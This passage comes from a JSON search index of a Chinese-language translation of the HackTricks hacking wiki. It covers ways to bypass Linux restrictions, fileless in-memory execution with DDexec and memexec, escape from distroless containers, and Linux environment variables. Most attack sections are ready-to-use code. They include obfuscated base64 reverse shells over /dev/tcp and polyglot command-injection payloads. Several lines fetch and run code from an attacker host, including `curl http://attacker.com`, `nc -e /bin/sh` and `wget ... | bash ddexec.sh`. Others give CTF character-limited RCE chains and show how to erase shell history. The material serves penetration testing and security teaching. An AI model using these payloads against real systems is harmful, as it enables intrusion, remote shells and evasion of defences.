--sport 53 -j ACCEPT\\niptables -A INPUT -p tcp -m tcp --sport 53 -j ACCEPT\\niptables -A OUTPUT -p udp -m udp --dport 53 -j ACCEPT\\niptables -A OUTPUT -p tcp -m tcp --dport 53 -j ACCEPT #default policies\\niptables -P INPUT DROP\\niptables -P FORWARD ACCEPT\\niptables -P OUTPUT ACCEPT tip 学习和实践 AWS 黑客技术: 
HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Useful Linux Commands » Iptables","id":"1928","title":"Iptables"},"1929":{"body":"Reading time: 13 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Bypass Linux Restrictions » 绕过 Linux 限制","id":"1929","title":"绕过 Linux 限制"},"193":{"body":"连接到网络的设备可以通过设备的 Web 服务 (WSD) 识别可用服务,如打印机。这涉及广播 UDP 数据包。寻求服务的设备发送请求,而服务提供者则宣布其提供的服务。","breadcrumbs":"Pentesting Network » Network Protocols Explained (ESP) » 设备的 Web 服务 (WSD)","id":"193","title":"设备的 Web 服务 (WSD)"},"1930":{"body":"","breadcrumbs":"Bypass Linux Restrictions » 常见限制绕过","id":"1930","title":"常见限制绕过"},"1931":{"body":"bash # Double-Base64 is a great way to avoid bad characters like +, works 99% of the time\\necho \\"echo $(echo \'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1\' | base64 | base64)|ba\'\'se\'\'6\'\'4 -\'\'d|ba\'\'se\'\'64 -\'\'d|b\'\'a\'\'s\'\'h\\" | sed \'s/ /${IFS}/g\'\\n# echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba\'\'se\'\'6\'\'4${IFS}-\'\'d|ba\'\'se\'\'64${IFS}-\'\'d|b\'\'a\'\'s\'\'h","breadcrumbs":"Bypass Linux Restrictions » 反向 Shell","id":"1931","title":"反向 Shell"},"1932":{"body":"bash #Trick from Dikline\\n#Get a rev shell with\\n(sh)0>/dev/tcp/10.10.10.10/443\\n#Then get the out of the rev shell executing inside of it:\\nexec >&0","breadcrumbs":"Bypass Linux Restrictions » 短 Rev 
shell","id":"1932","title":"短 Rev shell"},"1933":{"body":"bash # Question mark binary substitution\\n/usr/bin/p?ng # /usr/bin/ping\\nnma? -p 80 localhost # /usr/bin/nmap -p 80 localhost # Wildcard(*) binary substitution\\n/usr/bin/who*mi # /usr/bin/whoami # Wildcard + local directory arguments\\ntouch -- -la # -- stops processing options after the --\\nls *\\necho * #List current files and folders with echo and wildcard # [chars]\\n/usr/bin/n[c] # /usr/bin/nc # Quotes\\n\'p\'i\'n\'g # ping\\n\\"w\\"h\\"o\\"a\\"m\\"i # whoami\\nech\'\'o test # echo test\\nech\\"\\"o test # echo test\\nbas\'\'e64 # base64 #Backslashes\\n\\\\u\\\\n\\\\a\\\\m\\\\e \\\\-\\\\a # uname -a\\n/\\\\b\\\\i\\\\n/////s\\\\h # $@\\nwho$@ami #whoami # Transformations (case, reverse, base64)\\n$(tr \\"[A-Z]\\" \\"[a-z]\\"<<<\\"WhOaMi\\") #whoami -> Upper case to lower case\\n$(a=\\"WhOaMi\\";printf %s \\"${a,,}\\") #whoami -> transformation (only bash)\\n$(rev<<<\'imaohw\') #whoami\\nbash<<<$(base64 -d<< /tmp/[\\nchmod +x [\\nexport PATH=/tmp:$PATH\\nif [ \\"a\\" ]; then echo 1; fi # Will print hello!","breadcrumbs":"Bypass Linux Restrictions » 内置命令","id":"1942","title":"内置命令"},"1943":{"body":"bash 1;sleep${IFS}9;#${IFS}\';sleep${IFS}9;#${IFS}\\";sleep${IFS}9;#${IFS}\\n/*$(sleep 5)`sleep 5``*/-sleep(5)-\'/*$(sleep 5)`sleep 5` #*/-sleep(5)||\'\\"||sleep(5)||\\"/*`*/","breadcrumbs":"Bypass Linux Restrictions » 多语言命令注入","id":"1943","title":"多语言命令注入"},"1944":{"body":"bash # A regex that only allow letters and numbers might be vulnerable to new line characters\\n1%0a`curl http://attacker.com`","breadcrumbs":"Bypass Linux Restrictions » 绕过潜在的正则表达式","id":"1944","title":"绕过潜在的正则表达式"},"1945":{"body":"bash # From https://github.com/Bashfuscator/Bashfuscator\\n./bashfuscator -c \'cat /etc/passwd\'","breadcrumbs":"Bypass Linux Restrictions » Bashfuscator","id":"1945","title":"Bashfuscator"},"1946":{"body":"bash # From the Organge Tsai BabyFirst Revenge challenge: 
https://github.com/orangetw/My-CTF-Web-Challenges#babyfirst-revenge\\n#Oragnge Tsai solution\\n## Step 1: generate `ls -t>g` to file \\"_\\" to be able to execute ls ordening names by cration date\\nhttp://host/?cmd=>ls\\\\\\nhttp://host/?cmd=ls>_\\nhttp://host/?cmd=>\\\\ \\\\\\nhttp://host/?cmd=>-t\\\\\\nhttp://host/?cmd=>\\\\>g\\nhttp://host/?cmd=ls>>_ ## Step2: generate `curl orange.tw|python` to file \\"g\\"\\n## by creating the necesary filenames and writting that content to file \\"g\\" executing the previous generated file\\nhttp://host/?cmd=>on\\nhttp://host/?cmd=>th\\\\\\nhttp://host/?cmd=>py\\\\\\nhttp://host/?cmd=>\\\\|\\\\\\nhttp://host/?cmd=>tw\\\\\\nhttp://host/?cmd=>e.\\\\\\nhttp://host/?cmd=>ng\\\\\\nhttp://host/?cmd=>ra\\\\\\nhttp://host/?cmd=>o\\\\\\nhttp://host/?cmd=>\\\\ \\\\\\nhttp://host/?cmd=>rl\\\\\\nhttp://host/?cmd=>cu\\\\\\nhttp://host/?cmd=sh _\\n# Note that a \\"\\\\\\" char is added at the end of each filename because \\"ls\\" will add a new line between filenames whenwritting to the file ## Finally execute the file \\"g\\"\\nhttp://host/?cmd=sh g # Another solution from https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/\\n# Instead of writing scripts to a file, create an alphabetically ordered the command and execute it with \\"*\\"\\nhttps://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/\\n## Execute tar command over a folder\\nhttp://52.199.204.34/?cmd=>tar\\nhttp://52.199.204.34/?cmd=>zcf\\nhttp://52.199.204.34/?cmd=>zzz\\nhttp://52.199.204.34/?cmd=*%20/h* # Another curiosity if you can read files of the current folder\\nln /f*\\n## If there is a file /flag.txt that will create a hard link\\n## to it in the current folder","breadcrumbs":"Bypass Linux Restrictions » 5个字符的RCE","id":"1946","title":"5个字符的RCE"},"1947":{"body":"bash # In a similar fashion to the previous bypass this one just need 4 chars to execute commands\\n# it will follow the same principle of creating the command `ls -t>g` in a 
file\\n# and then generate the full command in filenames\\n# generate \\"g> ht- sl\\" to file \\"v\\"\\n\'>dir\'\\n\'>sl\'\\n\'>g\\\\>\'\\n\'>ht-\'\\n\'*>v\' # reverse file \\"v\\" to file \\"x\\", content \\"ls -th >g\\"\\n\'>rev\'\\n\'*v>x\' # generate \\"curl orange.tw|python;\\"\\n\'>\\\\;\\\\\\\\\'\\n\'>on\\\\\\\\\'\\n\'>th\\\\\\\\\'\\n\'>py\\\\\\\\\'\\n\'>\\\\|\\\\\\\\\'\\n\'>tw\\\\\\\\\'\\n\'>e.\\\\\\\\\'\\n\'>ng\\\\\\\\\'\\n\'>ra\\\\\\\\\'\\n\'>o\\\\\\\\\'\\n\'>\\\\ \\\\\\\\\'\\n\'>rl\\\\\\\\\'\\n\'>cu\\\\\\\\\' # got shell\\n\'sh x\'\\n\'sh g\'","breadcrumbs":"Bypass Linux Restrictions » RCE 与 4 个字符","id":"1947","title":"RCE 与 4 个字符"},"1948":{"body":"如果您在一个具有 只读和无执行保护 的文件系统中,甚至在一个无发行版容器中,仍然有方法可以 执行任意二进制文件,甚至是一个 shell!: Bypass FS protections: read-only / no-exec / Distroless","breadcrumbs":"Bypass Linux Restrictions » 只读/无执行/无发行版旁路","id":"1948","title":"只读/无执行/无发行版旁路"},"1949":{"body":"Escaping from Jails","breadcrumbs":"Bypass Linux Restrictions » Chroot 和其他监狱旁路","id":"1949","title":"Chroot 和其他监狱旁路"},"195":{"body":"RADIUS(远程身份验证拨号用户服务)是一种网络访问协议,主要由 ISP 使用。它支持身份验证、授权和计费。用户凭据由 RADIUS 服务器验证,可能包括网络地址验证以增强安全性。身份验证后,用户获得网络访问权限,其会话详细信息会被跟踪以用于计费和统计目的。","breadcrumbs":"Pentesting Network » Network Protocols Explained (ESP) » RADIUS","id":"195","title":"RADIUS"},"1950":{"body":"当一个漏洞让您部分控制一个最终到达 system() 或另一个 shell 的参数时,您可能不知道执行开始读取您的有效负载的确切偏移量。传统的 NOP 滑道(例如 \\\\x90)在 shell 语法中 不 起作用,但 Bash 会在执行命令之前无害地忽略前导空格。 因此,您可以通过在真实命令前加上一长串空格或制表符来创建一个 Bash 的 NOP 滑道 : bash # Payload sprayed into an environment variable / NVRAM entry\\n\\" nc -e /bin/sh 10.0.0.1 4444\\"\\n# 16× spaces ───┘ ↑ real command 如果 ROP 链(或任何内存损坏原语)将指令指针放置在空间块内,Bash 解析器会简单地跳过空格,直到到达 nc,可靠地执行您的命令。 实际使用案例: 内存映射配置块 (例如 NVRAM),可跨进程访问。 攻击者无法写入 NULL 字节以对齐有效负载的情况。 仅提供 BusyBox ash/sh 的嵌入式设备 – 它们也会忽略前导空格。 🛠️ 将此技巧与调用 system() 的 ROP 小工具结合使用,可以显著提高在内存受限的 IoT 路由器上的利用可靠性。","breadcrumbs":"Bypass Linux Restrictions » 基于空间的 Bash NOP 滑道 (\\"Bashsledding\\")","id":"1950","title":"基于空间的 Bash NOP 滑道 
(\\"Bashsledding\\")"},"1951":{"body":"https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0 https://www.secjuice.com/web-application-firewall-waf-evasion/ Exploiting zero days in abandoned hardware – Trail of Bits blog tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Bypass Linux Restrictions » 参考资料与更多信息","id":"1951","title":"参考资料与更多信息"},"1952":{"body":"Reading time: 9 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » 绕过文件系统保护:只读 / 无执行 / Distroless","id":"1952","title":"绕过文件系统保护:只读 / 无执行 / Distroless"},"1953":{"body":"在以下视频中,您可以找到本页面提到的技术的更深入解释: DEF CON 31 - 探索Linux内存操控以实现隐蔽和规避 使用DDexec-ng和内存dlopen()进行隐蔽入侵 - HackTricks Track 2023","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » 视频","id":"1953","title":"视频"},"1954":{"body":"越来越多的Linux机器以 只读(ro)文件系统保护 的方式挂载,特别是在容器中。这是因为运行一个ro文件系统的容器就像在securitycontext中设置**readOnlyRootFilesystem: true**一样简单: apiVersion: v1\\nkind: Pod\\nmetadata:\\nname: alpine-pod\\nspec:\\ncontainers:\\n- name: alpine\\nimage: alpine\\nsecurityContext: readOnlyRootFilesystem: true command: [\\"sh\\", \\"-c\\", \\"while true; do sleep 1000; done\\"] 然而,即使文件系统以ro方式挂载, /dev/shm 仍然是可写的,因此我们不能写入磁盘的说法是错误的。然而,这个文件夹将会 以无执行保护挂载 ,所以如果您在这里下载一个二进制文件,您 将无法执行它 。 warning 从红队的角度来看,这使得 下载和执行 系统中尚不存在的二进制文件(如后门或像kubectl这样的枚举器)变得 复杂 。","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » 只读 / 无执行场景","id":"1954","title":"只读 / 无执行场景"},"1955":{"body":"请注意,我提到的是二进制文件,您可以 执行任何脚本 ,只要解释器在机器内部,例如如果sh存在,则可以执行 shell脚本 ,或者如果安装了python,则可以执行 python脚本 。 然而,这并不足以执行您的二进制后门或您可能需要运行的其他二进制工具。","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » 最简单的绕过:脚本","id":"1955","title":"最简单的绕过:脚本"},"1956":{"body":"如果您想执行一个二进制文件,但文件系统不允许这样做,最好的方法是通过 从内存中执行它 ,因为 保护措施不适用于那里 。","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » 内存绕过","id":"1956","title":"内存绕过"},"1957":{"body":"如果您在机器内部有一些强大的脚本引擎,例如 Python 、 Perl 或 Ruby ,您可以将二进制文件下载到内存中执行,将其存储在内存文件描述符中(create_memfd系统调用),这不会受到这些保护的限制,然后调用**exec系统调用**,将 fd作为要执行的文件 。 为此,您可以轻松使用项目 fileless-elf-exec 。您可以传递一个二进制文件,它将生成一个指定语言的脚本, 二进制文件经过压缩和b64编码 ,并包含 解码和解压缩 它的指令,使用调用create_memfd系统调用创建的 fd ,以及调用 exec 系统调用来运行它。 warning 
这在其他脚本语言中不起作用,例如PHP或Node,因为它们没有任何 默认方式从脚本调用原始系统调用 ,因此无法调用create_memfd来创建 内存fd 以存储二进制文件。 此外,使用/dev/shm中的文件创建 常规fd 也不起作用,因为您将无法运行它,因为 无执行保护 将适用。","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » FD + exec系统调用绕过","id":"1957","title":"FD + exec系统调用绕过"},"1958":{"body":"DDexec / EverythingExec 是一种技术,允许您通过覆盖其**/proc/self/mem 来 修改您自己的进程的内存**。 因此, 控制正在被进程执行的汇编代码 ,您可以编写 shellcode 并“变异”该进程以 执行任何任意代码 。 tip DDexec / EverythingExec 将允许您加载并 执行 您自己的 shellcode 或 任何二进制文件 从 内存 中。 bash # Basic example\\nwget -O- https://attacker.com/binary.elf | base64 -w0 | bash ddexec.sh argv0 foo bar 有关此技术的更多信息,请查看 Github 或: DDexec / EverythingExec","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » DDexec / EverythingExec","id":"1958","title":"DDexec / EverythingExec"},"1959":{"body":"Memexec 是 DDexec 的自然下一步。它是一个 DDexec shellcode demonised ,因此每次您想要 运行不同的二进制文件 时,您无需重新启动 DDexec,只需通过 DDexec 技术运行 memexec shellcode,然后 与此守护进程通信以传递要加载和运行的新二进制文件 。 您可以在 https://github.com/arget13/memexec/blob/main/a.php 中找到如何使用 memexec 从 PHP 反向 shell 执行二进制文件 的示例。","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » MemExec","id":"1959","title":"MemExec"},"196":{"body":"","breadcrumbs":"Pentesting Network » Network Protocols Explained (ESP) » SMB 和 NetBIOS","id":"196","title":"SMB 和 NetBIOS"},"1960":{"body":"与 DDexec 目的相似, memdlopen 技术允许以 更简单的方式在内存中加载二进制文件 以便后续执行。它甚至可以加载带有依赖项的二进制文件。","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » Memdlopen","id":"1960","title":"Memdlopen"},"1961":{"body":"","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » Distroless Bypass","id":"1961","title":"Distroless Bypass"},"1962":{"body":"Distroless 容器仅包含 运行特定应用程序或服务所需的最低组件 ,例如库和运行时依赖项,但排除了较大的组件,如包管理器、shell 或系统实用程序。 Distroless 容器的目标是 通过消除不必要的组件来减少容器的攻击面 ,并最小化可以被利用的漏洞数量。","breadcrumbs":"Bypass 
Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » 什么是 distroless","id":"1962","title":"什么是 distroless"},"1963":{"body":"在 distroless 容器中,您可能 甚至找不到 sh 或 bash 来获取常规 shell。您也不会找到 ls、whoami、id 等二进制文件……您通常在系统中运行的所有内容。 warning 因此,您 将无法 获取 反向 shell 或 枚举 系统,如您通常所做的那样。 然而,如果被攻陷的容器正在运行例如 flask web,那么 python 已安装,因此您可以获取 Python 反向 shell 。如果它正在运行 node,您可以获取 Node rev shell,其他大多数 脚本语言 也是如此。 tip 使用脚本语言,您可以 使用语言功能枚举系统 。 如果没有 read-only/no-exec 保护,您可以利用反向 shell 在文件系统中写入您的二进制文件 并 执行 它们。 tip 然而,在这种类型的容器中,这些保护通常会存在,但您可以使用 先前的内存执行技术来绕过它们 。 您可以在 https://github.com/carlospolop/DistrolessRCE 中找到 示例 ,了解如何 利用一些 RCE 漏洞 获取脚本语言的 反向 shell 并从内存中执行二进制文件。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » 反向 Shell","id":"1963","title":"反向 Shell"},"1964":{"body":"Reading time: 7 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » DDexec / EverythingExec » DDexec / EverythingExec","id":"1964","title":"DDexec / EverythingExec"},"1965":{"body":"在Linux中,为了运行一个程序,它必须作为一个文件存在,并且必须通过文件系统层次结构以某种方式可访问(这就是execve()的工作原理)。这个文件可以存储在磁盘上或在内存中(tmpfs, memfd),但你需要一个文件路径。这使得控制在Linux系统上运行的内容变得非常简单,容易检测威胁和攻击者的工具,或者防止他们尝试执行任何他们的内容(例如,不允许无权限用户将可执行文件放置在任何地方)。 但这个技术将改变这一切。如果你无法启动你想要的进程... 
那么你就劫持一个已经存在的进程 。 这个技术允许你 绕过常见的保护技术,如只读、noexec、文件名白名单、哈希白名单...","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » DDexec / EverythingExec » 背景","id":"1965","title":"背景"},"1966":{"body":"最终脚本依赖于以下工具才能工作,它们需要在你攻击的系统中可访问(默认情况下,你会在任何地方找到它们): dd\\nbash | zsh | ash (busybox)\\nhead\\ntail\\ncut\\ngrep\\nod\\nreadlink\\nwc\\ntr\\nbase64","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » DDexec / EverythingExec » 依赖","id":"1966","title":"依赖"},"1967":{"body":"如果您能够任意修改进程的内存,那么您就可以接管它。这可以用来劫持一个已经存在的进程并用另一个程序替换它。我们可以通过使用 ptrace() 系统调用(这要求您能够执行系统调用或在系统上有 gdb 可用)来实现这一点,或者更有趣的是,写入 /proc/$pid/mem。 文件 /proc/$pid/mem 是进程整个地址空间的一对一映射( 例如 从 0x0000000000000000 到 0x7ffffffffffff000 在 x86-64 中)。这意味着在偏移量 x 处读取或写入此文件与在虚拟地址 x 处读取或修改内容是相同的。 现在,我们面临四个基本问题: 一般来说,只有 root 和文件的程序所有者可以修改它。 ASLR。 如果我们尝试读取或写入未映射在程序地址空间中的地址,我们将得到 I/O 错误。 这些问题有解决方案,尽管它们并不完美,但还是不错的: 大多数 shell 解释器允许创建文件描述符,这些描述符将被子进程继承。我们可以创建一个指向 shell 的 mem 文件的 fd,并具有写权限……因此使用该 fd 的子进程将能够修改 shell 的内存。 ASLR 甚至不是问题,我们可以检查 shell 的 maps 文件或 procfs 中的任何其他文件,以获取有关进程地址空间的信息。 所以我们需要在文件上 lseek()。从 shell 中,这不能完成,除非使用臭名昭著的 dd。","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » DDexec / EverythingExec » 技术","id":"1967","title":"技术"},"1968":{"body":"这些步骤相对简单,不需要任何专业知识来理解: 解析我们想要运行的二进制文件和加载器,以找出它们需要什么映射。然后制作一个“shell”代码,广义上讲,它将执行内核在每次调用 execve() 时所做的相同步骤: 创建上述映射。 将二进制文件读入其中。 设置权限。 最后用程序的参数初始化堆栈,并放置辅助向量(加载器所需)。 跳转到加载器,让它完成其余工作(加载程序所需的库)。 从 syscall 文件中获取进程在执行的系统调用后将返回的地址。 用我们的 shellcode(通过 mem 我们可以修改不可写页面)覆盖该可执行位置。 将我们想要运行的程序传递给进程的 stdin(将被上述“shell”代码 read())。 此时,加载器将负责加载我们程序所需的库并跳转到它。 查看工具在 https://github.com/arget13/DDexec","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » DDexec / EverythingExec » 更详细地","id":"1968","title":"更详细地"},"1969":{"body":"有几种替代 dd 的方法,其中之一 tail 目前是用于通过 mem 文件 lseek() 的默认程序(这就是使用 dd 的唯一目的)。这些替代方案是: bash 
tail\\nhexdump\\ncmp\\nxxd 设置变量 SEEKER 可以更改使用的 seeker,例如: bash SEEKER=cmp bash ddexec.sh ls -l <<< $(base64 -w0 /bin/ls) 如果您找到另一个在脚本中未实现的有效探测器,您仍然可以通过设置 SEEKER_ARGS 变量来使用它: bash SEEKER=xxd SEEKER_ARGS=\'-s $offset\' zsh ddexec.sh ls -l <<< $(base64 -w0 /bin/ls) 阻止这个,EDRs。","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » DDexec / EverythingExec » EverythingExec","id":"1969","title":"EverythingExec"},"197":{"body":"SMB 是一种用于共享文件、打印机和端口的协议。它直接通过 TCP(端口 445)或通过 TCP 上的 NetBIOS(端口 137、138)操作。这种双重兼容性增强了与各种设备的连接。","breadcrumbs":"Pentesting Network » Network Protocols Explained (ESP) » SMB (服务器消息块)","id":"197","title":"SMB (服务器消息块)"},"1970":{"body":"https://github.com/arget13/DDexec tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Bypass Linux Restrictions » Bypass FS protections: read-only / no-exec / Distroless » DDexec / EverythingExec » 参考","id":"1970","title":"参考"},"1971":{"body":"Reading time: 5 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Environment Variables » Linux 环境变量","id":"1971","title":"Linux 环境变量"},"1972":{"body":"全局变量 将会 被 子进程 继承。 您可以通过以下方式为当前会话创建全局变量: bash export MYGLOBAL=\\"hello world\\"\\necho $MYGLOBAL #Prints: hello world 此变量将被当前会话及其子进程访问。 您可以通过以下方式 删除 变量: bash unset MYGLOBAL","breadcrumbs":"Linux Environment Variables » 全局变量","id":"1972","title":"全局变量"},"1973":{"body":"本地变量 只能被 当前的 shell/script 访问。 bash LOCAL=\\"my local\\"\\necho $LOCAL\\nunset LOCAL","breadcrumbs":"Linux Environment Variables » 本地变量","id":"1973","title":"本地变量"},"1974":{"body":"bash set\\nenv\\nprintenv\\ncat /proc/$$/environ\\ncat /proc/`python -c \\"import os; print(os.getppid())\\"`/environ","breadcrumbs":"Linux Environment Variables » 列出当前变量","id":"1974","title":"列出当前变量"},"1975":{"body":"来自: https://geek-university.com/linux/common-environment-variables/ DISPLAY – X 使用的显示器。此变量通常设置为 :0.0 ,表示当前计算机上的第一个显示器。 EDITOR – 用户首选的文本编辑器。 HISTFILESIZE – 历史文件中包含的最大行数。 HISTSIZE – 用户结束会话时添加到历史文件的行数。 HOME – 你的主目录。 HOSTNAME – 计算机的主机名。 LANG – 你当前的语言。 MAIL – 用户邮件存储的位置。通常是 /var/spool/mail/USER 。 MANPATH – 搜索手册页的目录列表。 OSTYPE – 操作系统的类型。 PS1 – bash 中的默认提示符。 PATH – 存储所有目录的路径,这些目录包含你想通过指定文件名而不是相对或绝对路径执行的二进制文件。 PWD – 当前工作目录。 SHELL – 当前命令 shell 的路径(例如, /bin/bash )。 TERM – 当前终端类型(例如, xterm )。 TZ – 你的时区。 USER – 你当前的用户名。","breadcrumbs":"Linux Environment Variables » 常见变量","id":"1975","title":"常见变量"},"1976":{"body":"","breadcrumbs":"Linux Environment Variables » 有趣的黑客变量","id":"1976","title":"有趣的黑客变量"},"1977":{"body":"将 此变量的值更改为 0 ,这样当你 结束会话 时, 历史文件 (~/.bash_history) 将被删除 。 bash export HISTFILESIZE=0","breadcrumbs":"Linux Environment Variables » HISTFILESIZE","id":"1977","title":"HISTFILESIZE"},"1978":{"body":"将 此变量的值更改为 0 ,这样当您 结束会话 时,任何命令都将被添加到 历史文件 (~/.bash_history)中。 bash export HISTSIZE=0","breadcrumbs":"Linux Environment Variables » HISTSIZE","id":"1978","title":"HISTSIZE"},"1979":{"body":"进程将使用此处声明的 proxy 通过 http 或 https 连接到互联网。 bash export 
http_proxy=\\"http://10.10.10.10:8080\\"\\nexport https_proxy=\\"http://10.10.10.10:8080\\"","breadcrumbs":"Linux Environment Variables » http_proxy & https_proxy","id":"1979","title":"http_proxy & https_proxy"},"198":{"body":"NetBIOS 管理网络会话和连接以共享资源。它支持设备的唯一名称和多个设备的组名称,从而实现有针对性或广播消息。通信可以是无连接的(无确认)或面向连接的(基于会话)。虽然 NetBIOS 传统上通过 IPC/IPX 等协议操作,但它通常在 TCP/IP 上使用。NetBEUI 是一种相关协议,以其速度而闻名,但由于广播也相当冗长。","breadcrumbs":"Pentesting Network » Network Protocols Explained (ESP) » NetBIOS (网络基本输入/输出系统)","id":"198","title":"NetBIOS (网络基本输入/输出系统)"},"1980":{"body":"进程将信任 这些环境变量 中指示的证书。 bash export SSL_CERT_FILE=/path/to/ca-bundle.pem\\nexport SSL_CERT_DIR=/path/to/ca-certificates","breadcrumbs":"Linux Environment Variables » SSL_CERT_FILE & SSL_CERT_DIR","id":"1980","title":"SSL_CERT_FILE & SSL_CERT_DIR"},"1981":{"body":"更改提示的外观。 这是一个示例 Root: 普通用户: 一个、两个和三个后台作业: 一个后台作业,一个已停止,最后一个命令未正确完成: tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Environment Variables » PS1","id":"1981","title":"PS1"},"1982":{"body":"Reading time: 7 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
